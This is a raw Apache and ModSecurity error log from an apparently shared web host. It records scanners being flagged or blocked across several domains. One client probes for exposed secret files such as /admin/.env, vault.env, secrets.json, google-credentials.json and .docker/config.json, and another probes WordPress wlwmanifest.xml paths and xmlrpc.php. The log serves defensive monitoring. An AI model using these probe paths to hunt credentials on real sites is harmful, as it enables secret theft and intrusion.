[Tue May 26 17:04:19.817842 2026] [security2:error] [pid 851641:tid 851893] [client 5.255.99.53:38238] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOxp8QSN2510avp4ryQAAAHo"]
[Tue May 26 17:04:19.889304 2026] [security2:error] [pid 851641:tid 851775] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFOxp8QSN2510avp4rvwAAAAQ"]
[Tue May 26 17:04:20.376467 2026] [security2:error] [pid 851641:tid 851880] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOxp8QSN2510avp4ryAAAAG0"], referer: http://preetishah.com/config/application.properties
[Tue May 26 17:04:20.529555 2026] [security2:error] [pid 851641:tid 851819] [client 5.255.99.53:46592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOxp8QSN2510avp4rzwAAADA"], referer: http://preetishah.com/secrets.json
[Tue May 26 17:04:20.593531 2026] [security2:error] [pid 851641:tid 851850] [client 5.255.99.53:46650] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPBp8QSN2510avp4r2AAAAE8"], referer: http://preetishah.com/.docker/config.json
[Tue May 26 17:04:20.651589 2026] [security2:error] [pid 851641:tid 851811] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPBp8QSN2510avp4r3wAAACg"], referer: http://preetishah.com/vault.env
[Tue May 26 17:04:20.776463 2026] [security2:error] [pid 851641:tid 851840] [client 5.255.99.53:46622] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPBp8QSN2510avp4r5AAAAEU"], referer: http://preetishah.com/google-credentials.json
[Tue May 26 17:04:20.934840 2026] [security2:error] [pid 851641:tid 851854] [client 45.154.98.38:55414] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.ndequipments.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWFPBp8QSN2510avp4r7gAAAFM"]
[Tue May 26 17:04:21.229162 2026] [security2:error] [pid 851641:tid 851869] [client 72.14.147.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWFPRp8QSN2510avp4sDgAAAGI"]
[Tue May 26 17:04:21.239284 2026] [autoindex:error] [pid 851641:tid 851888] [client 72.14.147.208:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/gallery/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:04:21.412521 2026] [security2:error] [pid 851641:tid 851853] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPRp8QSN2510avp4r-wAAAFI"], referer: http://preetishah.com/admin/.env
[Tue May 26 17:04:21.415703 2026] [security2:error] [pid 851641:tid 851866] [client 102.217.241.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFPBp8QSN2510avp4r9AAAAF8"]
[Tue May 26 17:04:21.465272 2026] [security2:error] [pid 851641:tid 851815] [client 45.154.98.38:61803] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWFPRp8QSN2510avp4sEQAAACw"]
[Tue May 26 17:04:22.100641 2026] [security2:error] [pid 851641:tid 851855] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFPRp8QSN2510avp4sGwAAAFQ"]
[Tue May 26 17:04:23.179780 2026] [security2:error] [pid 851641:tid 851853] [client 47.128.19.171:25136] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mosykay.com"] [uri "/robots.txt"] [unique_id "ahWFPxp8QSN2510avp4seAAAAFI"]
[Tue May 26 17:04:23.325428 2026] [security2:error] [pid 851641:tid 851860] [client 45.154.98.38:61066] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.ndequipments.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWFPxp8QSN2510avp4sfgAAAFk"]
[Tue May 26 17:04:23.365326 2026] [security2:error] [pid 851641:tid 851873] [client 5.255.99.53:38174] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sUAAAAGY"]
[Tue May 26 17:04:23.372710 2026] [security2:error] [pid 851641:tid 851814] [client 5.255.99.53:38078] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sRAAAACs"]
[Tue May 26 17:04:23.375064 2026] [security2:error] [pid 851641:tid 851807] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sYwAAACQ"]
[Tue May 26 17:04:23.386885 2026] [security2:error] [pid 851641:tid 851851] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sZAAAAFA"]
[Tue May 26 17:04:23.388306 2026] [security2:error] [pid 851641:tid 851833] [client 5.255.99.53:38062] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sRgAAAD4"]
[Tue May 26 17:04:23.399926 2026] [security2:error] [pid 851641:tid 851877] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sZQAAAGo"]
[Tue May 26 17:04:23.412084 2026] [security2:error] [pid 851641:tid 851896] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sXQAAAH0"]
[Tue May 26 17:04:23.417485 2026] [security2:error] [pid 851641:tid 851827] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sZwAAADg"]
[Tue May 26 17:04:23.425167 2026] [security2:error] [pid 851641:tid 851780] [client 5.255.99.53:37966] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sSQAAAAk"]
[Tue May 26 17:04:23.621521 2026] [security2:error] [pid 851641:tid 851865] [client 45.154.98.38:57487] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.ndequipments.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWFPxp8QSN2510avp4slwAAAF4"]
[Tue May 26 17:04:23.905661 2026] [security2:error] [pid 851641:tid 851834] [client 114.119.140.179:35855] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "landsonlogistics.com"] [uri "/robots.txt"] [unique_id "ahWFPxp8QSN2510avp4sqwAAAD8"]
[Tue May 26 17:04:24.066705 2026] [security2:error] [pid 851641:tid 851808] [client 45.154.98.38:62873] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.ndequipments.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWFQBp8QSN2510avp4stAAAACU"]
[Tue May 26 17:04:24.101954 2026] [autoindex:error] [pid 851641:tid 851849] [client 181.214.166.101:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:04:24.218389 2026] [security2:error] [pid 851641:tid 851787] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFPxp8QSN2510avp4sqQAAABA"]
[Tue May 26 17:04:24.275169 2026] [security2:error] [pid 851641:tid 851815] [client 5.255.99.53:38054] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sRQAAACw"]
[Tue May 26 17:04:24.278324 2026] [security2:error] [pid 851641:tid 851786] [client 5.255.99.53:38098] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sWgAAAA8"]
[Tue May 26 17:04:24.283378 2026] [security2:error] [pid 851641:tid 851820] [client 5.255.99.53:38238] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sUgAAADE"]
[Tue May 26 17:04:24.289122 2026] [security2:error] [pid 851641:tid 851801] [client 5.255.99.53:38028] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sUQAAAB4"]
[Tue May 26 17:04:24.315119 2026] [security2:error] [pid 851641:tid 851857] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sWwAAAFY"]
[Tue May 26 17:04:24.320938 2026] [security2:error] [pid 851641:tid 851788] [client 5.255.99.53:57420] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sTgAAABE"]
[Tue May 26 17:04:24.331209 2026] [security2:error] [pid 851641:tid 851847] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sZgAAAEw"]
[Tue May 26 17:04:24.360412 2026] [security2:error] [pid 851641:tid 851889] [client 5.255.99.53:38130] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sWAAAAHY"]
[Tue May 26 17:04:24.361273 2026] [security2:error] [pid 851641:tid 851867] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sYgAAAGA"]
[Tue May 26 17:04:24.378702 2026] [security2:error] [pid 851641:tid 851806] [client 5.255.99.53:38142] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPhp8QSN2510avp4sVAAAACM"]
[Tue May 26 17:04:24.427161 2026] [security2:error] [pid 851641:tid 851811] [client 45.154.98.38:64136] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.ndequipments.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWFQBp8QSN2510avp4swAAAACg"]
[Tue May 26 17:04:24.478920 2026] [security2:error] [pid 851641:tid 851866] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPxp8QSN2510avp4sggAAAF8"]
[Tue May 26 17:04:24.488311 2026] [security2:error] [pid 851641:tid 851789] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPxp8QSN2510avp4sowAAABI"]
[Tue May 26 17:04:24.501363 2026] [security2:error] [pid 851641:tid 851846] [client 5.255.99.53:38296] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPxp8QSN2510avp4smgAAAEs"]
[Tue May 26 17:04:24.502919 2026] [security2:error] [pid 851641:tid 851824] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPxp8QSN2510avp4snAAAADU"]
[Tue May 26 17:04:24.521052 2026] [security2:error] [pid 851641:tid 851775] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPxp8QSN2510avp4spwAAAAQ"]
[Tue May 26 17:04:24.742383 2026] [security2:error] [pid 851641:tid 851773] [client 45.154.98.38:57672] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.ndequipments.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWFQBp8QSN2510avp4s1gAAAAI"]
[Tue May 26 17:04:25.091738 2026] [security2:error] [pid 851641:tid 851833] [client 45.154.98.38:58458] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.ndequipments.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWFQRp8QSN2510avp4s8wAAAD4"]
[Tue May 26 17:04:25.294268 2026] [security2:error] [pid 851641:tid 851855] [client 5.255.99.53:46486] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPxp8QSN2510avp4snQAAAFQ"], referer: http://preetishah.com/openapi.json
[Tue May 26 17:04:25.324686 2026] [security2:error] [pid 851641:tid 851774] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFPxp8QSN2510avp4soAAAAAM"], referer: http://preetishah.com/api/v2/settings
[Tue May 26 17:04:25.460118 2026] [security2:error] [pid 851641:tid 851887] [client 5.255.99.53:38078] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFQBp8QSN2510avp4s1wAAAHQ"]
[Tue May 26 17:04:25.464166 2026] [security2:error] [pid 851641:tid 851772] [client 5.255.99.53:38222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFQBp8QSN2510avp4s2AAAAAE"]
[Tue May 26 17:04:25.568504 2026] [security2:error] [pid 851641:tid 851784] [client 45.154.98.38:64851] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.ndequipments.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWFQRp8QSN2510avp4tGwAAAA0"]
[Tue May 26 17:04:25.976247 2026] [security2:error] [pid 851641:tid 851857] [client 45.154.98.38:50046] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.ndequipments.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWFQRp8QSN2510avp4tNAAAAFY"]
[Tue May 26 17:04:26.069005 2026] [security2:error] [pid 851641:tid 851851] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFQRp8QSN2510avp4tJAAAAFA"], referer: http://preetishah.com/api/v1/config
[Tue May 26 17:04:26.075584 2026] [security2:error] [pid 851641:tid 851826] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFQRp8QSN2510avp4tIwAAADc"], referer: http://preetishah.com/api/config
[Tue May 26 17:04:26.092703 2026] [security2:error] [pid 851641:tid 851834] [client 5.255.99.53:46540] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFQRp8QSN2510avp4tJQAAAD8"], referer: http://preetishah.com/__/firebase/init.json
[Tue May 26 17:04:26.225358 2026] [autoindex:error] [pid 851641:tid 851886] [client 66.84.95.51:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:04:26.328194 2026] [security2:error] [pid 851641:tid 851881] [client 5.255.99.53:46778] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFQRp8QSN2510avp4tMAAAAG4"], referer: http://preetishah.com/config.js
[Tue May 26 17:04:26.336148 2026] [security2:error] [pid 851641:tid 851893] [client 5.255.99.53:46798] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFQRp8QSN2510avp4tLwAAAHo"], referer: http://preetishah.com/.well-known/jwks.json
[Tue May 26 17:04:26.346737 2026] [security2:error] [pid 851641:tid 851773] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFQRp8QSN2510avp4tLQAAAAI"]
[Tue May 26 17:04:26.358365 2026] [security2:error] [pid 851641:tid 851794] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFQRp8QSN2510avp4tMwAAABc"], referer: http://preetishah.com/api/v1/env
[Tue May 26 17:04:26.381026 2026] [security2:error] [pid 851641:tid 851856] [client 45.154.98.38:64990] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.ndequipments.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWFQhp8QSN2510avp4tWAAAAFU"]
[Tue May 26 17:04:26.791535 2026] [security2:error] [pid 851641:tid 851787] [client 45.154.98.38:53916] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.ndequipments.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWFQhp8QSN2510avp4tXwAAABA"]
[Tue May 26 17:04:27.221829 2026] [security2:error] [pid 851641:tid 851797] [client 45.154.98.38:54383] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.ndequipments.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWFQxp8QSN2510avp4tbAAAABo"]
[Tue May 26 17:04:27.535761 2026] [autoindex:error] [pid 851641:tid 851815] [client 181.214.166.101:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:04:27.573476 2026] [security2:error] [pid 851641:tid 851809] [client 45.154.98.38:56963] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.ndequipments.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWFQxp8QSN2510avp4tegAAACY"]
